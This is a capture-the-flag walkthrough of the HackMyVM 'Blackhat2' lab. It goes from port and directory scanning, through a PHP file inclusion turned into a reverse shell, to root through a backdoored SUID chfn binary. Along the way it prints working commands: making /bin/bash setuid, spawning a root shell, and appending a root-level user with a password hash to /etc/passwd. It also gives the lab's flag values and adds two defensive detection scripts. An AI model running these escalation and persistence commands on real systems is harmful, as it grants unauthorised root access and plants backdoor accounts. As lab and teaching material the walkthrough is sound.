HackMyVM-Blackhat2-WalkThrough
城南花已开

Information Gathering

Service discovery

```
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e4:1a:e5 VMware, Inc.
192.168.60.164 08:00:27:32:51:be PCS Systemtechnik GmbH
192.168.60.254 00:50:56:e0:e5:17 VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.063 seconds (124.09 hosts/sec). 4 responded
export ip=192.168.60.164
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Because guessing isn't hacking.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.164:22
Open 192.168.60.164:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-29 10:31 CST
Initiating ARP Ping Scan at 10:31
Scanning 192.168.60.164 [1 port]
Completed ARP Ping Scan at 10:31, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:31
Completed Parallel DNS resolution of 1 host. at 10:31, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 10:31
Scanning 192.168.60.164 [2 ports]
Discovered open port 80/tcp on 192.168.60.164
Discovered open port 22/tcp on 192.168.60.164
Completed SYN Stealth Scan at 10:31, 0.05s elapsed (2 total ports)
Nmap scan report for 192.168.60.164
Host is up, received arp-response (0.00038s latency).
Scanned at 2025-04-29 10:31:46 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:32:51:BE (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
```

Directory enumeration

```
❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -t 50 -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.164
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 996]
/index.php (Status: 200) [Size: 996]
/news.php (Status: 200) [Size: 3418]
/2021 (Status: 200) [Size: 31875]
/2022 (Status: 200) [Size: 34213]
/2023 (Status: 200) [Size: 36067]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================
```

news.php has a field where an email address can be entered.


You can submit content, but when you click Send it simply prints "sent"; this is hard-coded in the page and only fakes the appearance that something was sent.


LFI2Rce

I tried modifying the year parameter of the GET request directly, which bypasses the year restriction.

Tried LFI (local file inclusion); the file could be read without problems.


Tried reading through PHP filters; the content could be read that way as well.

Use LFI2RCE to get a reverse shell.

Reference: LFI2RCE via PHP Filters - HackTricks

Root privilege escalation

Listen on a port

```
❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 → 127.0.0.1 • 192.168.60.100
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from blackhat2.hmv-192.168.60.164-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/blackhat2.hmv~192.168.60.164_Linux_x86_64/2025_05_15-09_17_10-508.log 📜
───────────────────────────────────────────────────────────────────────────
www-data@blackhat2:/var/www/html$
```

Damn, I got stuck here; the box is too clean, with no hints at all.

After reading the author's writeup, it turns out the SUID chfn is a backdoor program. Most people would not suspect this system binary of being a backdoor, so it is very well hidden; one should not rely on preconceptions.

The dpkg command shows that /usr/bin/chfn was recently modified.

```
www-data@blackhat2:/home$ dpkg --verify
missing c /etc/apache2/sites-available/000-default.conf
missing c /etc/apache2/sites-available/default-ssl.conf
??5?????? c /etc/grub.d/10_linux
??5?????? /usr/bin/chfn
www-data@blackhat2:/home$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/umount
www-data@blackhat2:/home$ ls -al /usr/bin/chfn
-rwsr-xr-x 1 root root 169256 Feb 12 2023 /usr/bin/chfn
```
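A defender-side cross-check for the two commands above, added here as an example and not part of the original writeup: it intersects the md5 mismatches reported by `dpkg --verify` with the setuid file list, so a tampered SUID binary such as chfn stands out while ordinary package drift (the grub conffile) is ignored. The sample inputs are constructed from the output shown on this page.

```sh
# Added example (not from the original writeup): flag setuid binaries whose
# content no longer matches the installed package, using dpkg --verify output.

# Constructed sample: the dpkg --verify lines shown on this page.
DPKG_VERIFY_SAMPLE='missing c /etc/apache2/sites-available/000-default.conf
missing c /etc/apache2/sites-available/default-ssl.conf
??5?????? c /etc/grub.d/10_linux
??5?????? /usr/bin/chfn'

# Constructed sample: a subset of the find / -perm -u=s output shown on this page.
SUID_SAMPLE='/usr/bin/passwd
/usr/bin/chfn
/usr/bin/su'

# Print each path that is both setuid and reported by dpkg --verify with an
# md5 mismatch.  $1 = dpkg --verify output, $2 = newline-separated setuid list.
flag_modified_suid() {
    printf '%s\n' "$2" | awk -v verify="$1" '
        BEGIN {
            n = split(verify, lines, "\n")
            for (i = 1; i <= n; i++) {
                nf = split(lines[i], f, " ")
                # The status field is 9 characters ("??5??????"); a 5 in the
                # third position means the md5 digest differs from the package.
                # The path is the last field, after the optional "c" conffile flag.
                if (nf > 1 && f[1] ~ /^..5/) modified[f[nf]] = 1
            }
        }
        ($0 in modified) { print }
    '
}

# Live usage on a host (run as root so every file can be read and hashed):
#   flag_modified_suid "$(dpkg --verify 2>/dev/null)" "$(find / -perm -u=s -type f 2>/dev/null)"
# On the sample above this prints only /usr/bin/chfn: 10_linux is modified but
# not setuid, and passwd/su are setuid but match their package.
```

A binary that `dpkg -S` cannot attribute to any package at all is not covered by `dpkg --verify` and needs a separate check.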

Download it to the local machine for analysis.

```
[!] Session detached ⇲

(Penelope)─(Session [1])> download /usr/bin/chfn
[+] Download OK '/home/Pepster/.penelope/blackhat2.hmv~192.168.60.164_Linux_x86_64/downloads/usr/bin/chfn'
```


You can see that setgid(0) and setuid(0) set the process's group ID and user ID to 0 (root).

It then calls system() to execute /tmp/system, using nohup and output redirection to run it in the background.

So we create system in /tmp and write a command into it.

```
www-data@blackhat2:/home$ cd /tmp/
www-data@blackhat2:/tmp$ echo "chmod +s /bin/bash">system
www-data@blackhat2:/tmp$ chmod +x system
www-data@blackhat2:/tmp$ /usr/bin/chfn
Changing the user information for root
Enter the new value, or press ENTER for the default
Full Name [root]: ^C
```

After running it, monitoring processes with pspy shows that /tmp/system was executed as well.

```
2025/05/15 03:58:43 CMD: UID=33    PID=12312  | /usr/bin/bash -i
2025/05/15 03:58:43 CMD: UID=0 PID=12313 | /usr/bin/chfn
2025/05/15 03:58:43 CMD: UID=0 PID=12314 | sh -c nohup /tmp/system </dev/null >/dev/null 2>&1 &
2025/05/15 03:58:43 CMD: UID=0 PID=12315 | /bin/sh /tmp/system
```
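The pspy lines above also make a simple detection rule, added here as an example that is not part of the original writeup: a UID=0 process executing anything under a world-writable directory such as /tmp or /dev/shm is exactly the trace this backdoor leaves. The sample log is constructed from the four lines shown on this page; a real pspy capture should be saved without colour codes.

```sh
# Added example (not from the original writeup): flag root processes that
# execute from world-writable directories in pspy-style process logs.

# Constructed sample: the four pspy lines shown on this page.
PSPY_SAMPLE='2025/05/15 03:58:43 CMD: UID=33    PID=12312  | /usr/bin/bash -i
2025/05/15 03:58:43 CMD: UID=0 PID=12313 | /usr/bin/chfn
2025/05/15 03:58:43 CMD: UID=0 PID=12314 | sh -c nohup /tmp/system </dev/null >/dev/null 2>&1 &
2025/05/15 03:58:43 CMD: UID=0 PID=12315 | /bin/sh /tmp/system'

# Print "PID<TAB>command" for every UID=0 entry whose command line references
# a path under /tmp/ or /dev/shm/.  $1 = pspy output.
flag_root_exec_from_tmp() {
    printf '%s\n' "$1" | awk '
        # Fields: date time "CMD:" UID=n PID=n "|" command...; the uneven
        # spacing pspy emits is harmless because awk splits on runs of blanks.
        $4 == "UID=0" {
            cmd = $0
            sub(/^[^|]*\| /, "", cmd)           # keep only the command line
            pid = $5
            sub(/^PID=/, "", pid)
            # Match /tmp/ or /dev/shm/ only at the start of a path token, so
            # </dev/null redirections and names like /var/tmp-foo do not fire.
            if (cmd ~ /(^|[^A-Za-z0-9_.])\/(tmp|dev\/shm)\//) print pid "\t" cmd
        }
    '
}

# Live usage on a saved capture:  flag_root_exec_from_tmp "$(cat pspy.log)"
# On the sample above this reports PIDs 12314 and 12315 (the nohup wrapper and
# /bin/sh /tmp/system); the chfn launch itself and the www-data shell are not flagged.
```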

Privilege escalation via bash, straight to root in one step.

```
www-data@blackhat2:/tmp$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1265648 Apr 23 2023 /bin/bash
www-data@blackhat2:/tmp$ bash -p
bash-5.2# whoami
root
bash-5.2# echo 'primary:zSZ7Whrr8hgwY:0:0::/root:/bin/bash'>>/etc/passwd
bash-5.2# exit
exit
www-data@blackhat2:/tmp$ su primary
Password:
root@blackhat2:/tmp#
root@blackhat2:/tmp# cat /root/root.txt
30f55e2f86961a07e3a181a82f602ed6
root@blackhat2:/tmp# cat /home/sml/user.txt
156532dab679edf6f8e53c8787a09264
```